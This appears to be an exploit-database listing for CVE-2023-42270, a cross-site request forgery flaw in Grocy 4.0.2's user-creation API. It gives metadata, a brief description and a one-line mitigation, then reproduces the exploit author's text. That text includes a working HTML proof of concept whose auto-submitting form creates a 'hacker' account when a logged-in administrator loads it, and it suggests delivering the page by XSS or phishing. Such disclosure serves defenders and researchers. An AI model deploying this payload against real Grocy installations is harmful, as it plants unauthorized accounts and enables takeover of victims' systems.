Grocy - exploit.company

vendor:

Grocy

by:

Chance Proctor

7.1

CVSS

HIGH

CSRF

352

CWE

Product Name: Grocy

Affected Version From: 4.0.0

Affected Version To: 4.0.2

Patch Exists: NO

Related CWE: CVE-2023-42270

CPE: a:grocy:grocy:4.0.2

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

Grocy <= 4.0.2 CSRF Vulnerability

In Grocy version 4.0.2, there is a Cross-Site Request Forgery (CSRF) vulnerability when creating a new user. The lack of CSRF token or verification methods allows an attacker to craft requests in JSON format to create a new user, exploiting the permission settings of the target user.

Mitigation:

To mitigate this vulnerability, implement proper CSRF tokens and verification mechanisms in the user creation process to prevent unauthorized requests.

Source

Exploit-DB raw data:

# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability
# Application: Grocy
# Version: <= 4.0.2
# Date: 09/21/2023
# Exploit Author: Chance Proctor
# Vendor Homepage: https://grocy.info/
# Software Link: https://github.com/grocy/grocy
# Tested on: Linux
# CVE : CVE-2023-42270



Overview
==================================================
When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.
This makes it easy to adjust your request since it is a known format. 
There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.
This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.



Proof of Concept
==================================================
Host the following html code via a XSS or delivery via a phishing campaign:

	<html>
	<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">
	<input name='username' value='hacker' type='hidden'>
	<input name='password' value='test' type='hidden'>
	<input type=submit>
	</form>
	<script>
	history.pushState('','', '/');
	document.forms[0].submit();
	</script>
	</html>


If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials

	Username: hacker
	Password: test

Note:
In order for this to work, the target must have Create User Permissions.
This is enabled by default.



Proof of Exploit/Reproduce
==================================================
http://xploit.sh/posts/cve-2023-42270/